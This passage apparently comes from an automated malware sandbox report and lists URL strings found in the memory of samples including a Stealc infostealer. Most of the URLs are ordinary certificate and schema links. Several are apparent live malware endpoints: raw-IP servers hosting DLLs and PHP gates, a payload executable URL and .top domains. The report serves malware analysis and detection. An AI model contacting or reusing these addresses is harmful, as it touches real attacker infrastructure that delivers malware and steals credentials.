Source: stealc_default2.exe, 0000000E.00000002.2886105690.000000000081E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.dll
Source: stealc_default2.exe, 0000000E.00000002.2886105690.000000000081E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.dllDt
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dll
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll=
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dllN
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://185.215.113.172fb6c2cc8dce150a.phption:
Source: 4ad48d7d65.exe, 0000002B.00000002.3186818225.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: 4ad48d7d65.exe, 0000002B.00000002.3186818225.0000000001216000.00000004.00000020.00020000.00000000.sdmp, 4ad48d7d65.exe, 0000002B.00000002.3186818225.0000000001227000.00000004.00000020.00020000.00000000.sdmp, 4ad48d7d65.exe, 0000002B.00000002.3186818225.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: 4ad48d7d65.exe, 0000002B.00000002.3186818225.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
Source: 4ad48d7d65.exe, 0000002B.00000002.3186818225.0000000001227000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
Source: 4ad48d7d65.exe, 0000002B.00000002.3186818225.0000000001227000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/)
Source: 4ad48d7d65.exe, 0000002B.00000002.3186818225.0000000001227000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php9
Source: 4ad48d7d65.exe, 0000002B.00000002.3186818225.0000000001227000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpI
Source: 4ad48d7d65.exe, 0000002B.00000002.3186818225.0000000001227000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpU
Source: 4ad48d7d65.exe, 0000002B.00000002.3186818225.0000000001227000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpq
Source: 4ad48d7d65.exe, 0000002B.00000002.3186818225.0000000001227000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/v
Source: 4ad48d7d65.exe, 0000002B.00000002.3186818225.0000000001227000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ws
Source: 4ad48d7d65.exe, 0000002B.00000002.3186818225.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206;
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/Offnewhere.exe
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.36/Offnewhere.exe_
Source: axplong.exe, 00000007.00000002.4561179734.00000000010F9000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: d0d468f327.exe, 00000024.00000003.3212968821.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: d0d468f327.exe, 00000024.00000003.3212968821.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: axplong.exe, 00000007.00000002.4561179734.00000000010F9000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: axplong.exe, 00000007.00000002.4561179734.00000000010F9000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: axplong.exe, 00000007.00000002.4561179734.00000000010F9000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: splwow64.exe, 0000001C.00000003.2937746757.0000000002921000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000029.00000003.3044061111.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif.29.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: splwow64.exe, 0000001C.00000003.2937746757.0000000002921000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000029.00000003.3044061111.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif.29.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: splwow64.exe, 0000001C.00000002.2991915904.000000000041F000.00000004.00000001.01000000.0000001C.sdmp, splwow64.exe, 0000001C.00000003.2937746757.0000000002921000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000029.00000003.3044061111.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif.29.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: splwow64.exe, 0000001C.00000003.2937746757.0000000002921000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000029.00000003.3044061111.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif.29.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: InstallUtil.exe, 00000014.00000002.3014718107.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: d0d468f327.exe, 00000024.00000003.3212968821.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: axplong.exe, 00000007.00000002.4561179734.00000000010F9000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: d0d468f327.exe, 00000024.00000003.3212968821.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: d0d468f327.exe, 00000024.00000003.3212968821.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: axplong.exe, 00000007.00000002.4561179734.00000000010F9000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: axplong.exe, 00000007.00000002.4561179734.00000000010F9000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: splwow64.exe.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: d0d468f327.exe, 00000024.00000003.3212968821.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: axplong.exe, 00000007.00000002.4561179734.00000000010F9000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe.7.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: d0d468f327.exe, 00000024.00000003.3212968821.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: Offnewhere.exe, 00000015.00000000.2796258598.00000000008F9000.00000002.00000001.01000000.00000014.sdmp	String found in binary or memory: http://home.sevtji17ht.top/pYdgAbRKumVXpoeGtZwN19
Source: 1.exe, 0000001B.00000000.2881014480.0000000000F04000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.tventji20vs.top/NWYJPzCYEvZpxoyKvBIK92
Source: Offnewhere.exe, 00000015.00000000.2796258598.00000000008F9000.00000002.00000001.01000000.00000014.sdmp, 1.exe, 0000001B.00000000.2881014480.0000000000F04000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: splwow64.exe, 0000001C.00000002.2991870621.0000000000408000.00000002.00000001.01000000.0000001C.sdmp, splwow64.exe, 0000001C.00000000.2918578471.0000000000408000.00000002.00000001.01000000.0000001C.sdmp, splwow64.exe.7.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: axplong.exe, 00000007.00000002.4561179734.00000000010F9000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3212968821.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, splwow64.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: axplong.exe, 00000007.00000002.4561179734.00000000010F9000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: axplong.exe, 00000007.00000002.4561179734.00000000010F9000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: axplong.exe, 00000007.00000002.4561179734.00000000010F9000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe.7.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: d0d468f327.exe, 00000024.00000003.3212968821.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: splwow64.exe, 0000001C.00000003.2937746757.0000000002921000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000029.00000003.3044061111.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif.29.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: splwow64.exe, 0000001C.00000003.2937746757.0000000002921000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000029.00000003.3044061111.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif.29.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: splwow64.exe, 0000001C.00000002.2991915904.000000000041F000.00000004.00000001.01000000.0000001C.sdmp, splwow64.exe, 0000001C.00000003.2937746757.0000000002921000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000029.00000003.3044061111.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif.29.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
